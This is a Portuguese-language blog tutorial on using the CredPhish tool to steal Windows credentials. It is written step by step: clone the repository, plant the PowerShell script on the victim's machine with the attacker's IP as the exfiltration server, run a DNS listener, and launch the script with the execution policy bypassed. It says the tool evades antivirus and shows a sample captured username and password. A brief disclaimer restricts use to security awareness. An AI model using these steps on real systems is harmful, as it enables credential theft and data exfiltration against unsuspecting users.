InformationSecurityPro

Marcos Henrique

Information Security Pro

O CredPhish realiza a captura de usuários e senhas e utiliza mecanismos que visam bypassar as camadas de proteção dos Antivírus.

É recomendável utilizar esta ferramenta apenas para ações de conscientização de segurança a fim de destacar os riscos que todos estamos expostos.

🔴 O uso indevido desta ferramenta é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.

01 - Passo

Realize o clone do projeto CredPhish e liste o conteúdo do diretório :

git clone https://github.com/tokyoneon/CredPhish

cd CredPhish/

ls -l

02 - Passo

Envie o script credphish.py para a máquina da Vítima e altera as linhas 2 e 6 :

$exfilServer = "IP do Atacante"
$companyEmail = "Domínio do E-mail"

03 - Passo

Execute o script dns_server.py

./dns_server.py

04 - Passo

Execute o script credphish.ps1 e preencha os campos :

PowerShell.exe -ExecutionPolicy Bypass .\credphish.ps1

05 - Passo

O Usuário e a Senha são enviados para a máquina do Atacante :

REDTEAM[[email protected]:P@ssw0rd]

👍 Se este artigo te ajudou compartilhe!

Autor

Marcos Henrique

São Paulo/SP

Ataques de Senhas

ByPass - Microsoft SmartScreen

O Microsoft SmartScreen é uma tecnologia de fil....

REDESIM - Proteja o seu CPF

A REDESIM é a Rede Nacional para a Simplificaçã....

Você já ouviu seus áudios g...

A popularidade dos assistentes virtuais já não ....

Cuidados ao Comprar Disposi...

Dispositivos USB como PenDrive e HDs Externos s....

Contato